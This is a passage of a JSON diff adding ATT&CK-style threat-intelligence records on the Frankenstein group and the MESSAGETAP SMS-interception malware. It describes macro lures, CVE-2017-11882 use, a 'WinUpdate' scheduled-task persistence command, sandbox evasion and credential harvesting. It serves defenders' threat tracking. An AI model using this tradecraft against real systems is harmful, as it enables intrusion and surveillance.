+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has run a command script to set up persistence as a scheduled task named \"WinUpdate\", as well as other encoded commands from the command-line.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a0a54af7-b2b2-4914-a987-b8646f94db58",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.619Z",
+ "created": "2020-05-11T19:28:48.995Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used trojanized Microsoft Word documents sent via email, which prompted the victim to enable macros.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--25892875-54af-463b-abd4-33ea4141982e",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.627Z",
+ "created": "2020-05-11T19:28:48.998Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used CVE-2017-11882 to execute code on the victim's machine.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--01e457f1-0fc5-473b-950c-82a2fd2a79a9",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.616Z",
+ "created": "2020-05-11T19:28:49.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has established persistence through a scheduled task using the command: /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR , named \"WinUpdate\".(Citation: Talos Frankenstein June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--eb9ccd35-7ddc-4340-acb7-788e109d0e59",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.554Z",
+ "created": "2020-05-11T19:28:48.976Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used trojanized documents that retrieve remote templates from an adversary-controlled website.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--658fac5c-df6e-4586-9850-5a7512e0d164",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.603Z",
+ "created": "2020-05-11T19:28:48.989Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used Word documents that prompts the victim to enable macros and run a Visual Basic script.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7638d7f9-ad02-4ca5-9212-d85b1f33b5f4",
+ "type": "relationship",
+ "modified": "2020-05-12T17:23:38.942Z",
+ "created": "2020-05-11T19:28:49.277Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has run encoded commands from the command line.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--75f107f3-cc95-449c-883b-590089f23913",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.617Z",
+ "created": "2020-05-11T19:44:34.960Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used MSbuild to execute an actor-created file.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cd469152-553f-4219-985c-b0689e27cc7e",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.607Z",
+ "created": "2020-05-11T19:44:35.028Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used WMI queries to check if various security applications were running, as well as the operating system version.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1c8e6547-4754-427e-b8da-6b1560c68381",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.700Z",
+ "created": "2020-05-11T19:44:35.038Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used WMI queries to check if various security applications were running, including VMWare and Virtualbox.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--31bdbd30-4938-48d6-ba95-1b90af01041c",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.605Z",
+ "created": "2020-05-11T19:44:35.090Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used WMI queries to detect if virtualization environments or analysis tools were running on the system.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5410e8d-a440-41a6-abcc-d7b1c4c097db",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.610Z",
+ "created": "2020-05-11T19:44:35.156Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has harvested credentials from the victim's machine using [Empire](https://attack.mitre.org/software/S0363).(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--39ebd556-6b3a-4129-bc43-406e07a5206d",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.628Z",
+ "created": "2020-05-11T21:30:27.754Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, looking for the public IP address of the system.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--baa3063b-13b9-4a32-adac-7c0cc40704c5",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.697Z",
+ "created": "2020-05-11T21:30:27.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has uploaded and downloaded files to utilize additional plugins.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--004a3a47-56df-4bb0-a732-c88d4c271937",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.622Z",
+ "created": "2020-05-11T21:30:27.787Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has collected information via [Empire](https://attack.mitre.org/software/S0363), which is automatically sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--44f65d7f-6f3d-4abe-a3e0-c8209fedbf37",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.735Z",
+ "created": "2020-05-11T21:30:27.790Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has collected information via [Empire](https://attack.mitre.org/software/S0363), which is automatically sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2e348f62-cc8c-48af-8a5f-d1e5a0fe870b",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.745Z",
+ "created": "2020-05-11T21:30:27.792Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, looking to obtain a list of all currently running processes.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--910ed1c2-bba1-422d-b64a-0188e8c57577",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.732Z",
+ "created": "2020-05-11T21:30:27.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, looking for the system's machine name.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f92333e5-9897-4a79-8e1f-4770867325a9",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.738Z",
+ "created": "2020-05-11T21:30:27.876Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7b9a6646-26d6-44ae-8f79-5d31f7c28059",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.740Z",
+ "created": "2020-05-11T21:30:27.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, gathering username, machine name, and administrative permissions information.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45fc2c32-6a20-4219-af45-e1d001724c45",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.743Z",
+ "created": "2020-05-11T21:30:27.882Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts via [Empire](https://attack.mitre.org/software/S0363), gathering various local system information.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--00c0e096-f023-4ccc-8567-d1e8c8494cb5",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.733Z",
+ "created": "2020-05-11T21:30:27.895Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts via [Empire](https://attack.mitre.org/software/S0363), gathering the username, domain name, machine name, and other system information.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8d4e36fc-65d8-4367-98ed-7e467b9e1f1b",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.796Z",
+ "created": "2020-05-11T21:30:27.899Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has deobfuscated base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.(Citation: Talos Frankenstein June 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--300c5a35-9f3a-4e0d-b04e-bad983ba7136",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.794Z",
+ "created": "2020-05-11T21:30:27.906Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) has XOR-encrypted and stored contents of SMS messages that matched its target list. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d6ddaace-75b2-4ff0-bb94-751095d6a357",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.278Z",
+ "created": "2020-05-11T22:12:28.655Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "After loading the keyword and phone data files, [MESSAGETAP](https://attack.mitre.org/software/S0443) begins monitoring all network connections to and from the victim server. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b565458d-7831-4010-9596-4d6fe44fd738",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.272Z",
+ "created": "2020-05-11T22:12:28.671Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3318f441-6593-4a7b-bb7f-53ab15a1a672",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.274Z",
+ "created": "2020-05-11T22:12:28.674Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "Once loaded into memory, [MESSAGETAP](https://attack.mitre.org/software/S0443) deletes the keyword_parm.txt and parm.txt configuration files from disk. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1d90e3ef-1839-4bb8-8205-02e2461b5d55",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.334Z",
+ "created": "2020-05-11T22:12:28.676Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
